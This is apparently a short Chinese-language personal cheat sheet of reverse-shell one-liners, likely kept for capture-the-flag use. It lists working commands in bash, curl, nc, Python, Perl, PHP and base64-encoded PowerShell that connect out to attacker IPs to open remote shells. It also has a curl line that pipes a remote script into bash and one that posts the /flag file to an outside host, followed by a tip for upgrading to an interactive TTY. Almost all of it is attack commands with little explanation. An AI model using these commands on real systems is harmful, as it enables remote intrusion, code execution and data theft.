反弹shell
收集一点可能用上的反弹shell命令
bash
bash -i >& /dev/tcp/ip/port 0>&1
curl
bash -i >& /dev/tcp/192.168.20.151/7777 0>&1
curl http://174.1.73.154/shell.txt|bash
PS:OOB的时候可以
curl 174.2.171.201:6666 -d @/flag
加@
表示文件
nc
nc -e /bin/sh ip port
python
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
perl
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"174.0.224.117:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
php
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
PowerShell
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('$c=New-Object Net.Sockets.TCPClient("174.1.52.162",6666);$s=$c.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$s.Read($bytes, 0, $bytes.Length)) -ne 0){;$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sb=(iex $d 2>&1 | Out-String );$sb2=$sb+''PS ''+(pwd).Path+''> '';$sb=([Text.Encoding]::Default).GetBytes($sb2);$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()'))
powershell -nop -enc {reverse shell command}
获取更好用的shell
Upgrading Simple Shells to Fully Interactive TTYs
pty
python -c 'import pty; pty.spawn("/bin/bash")'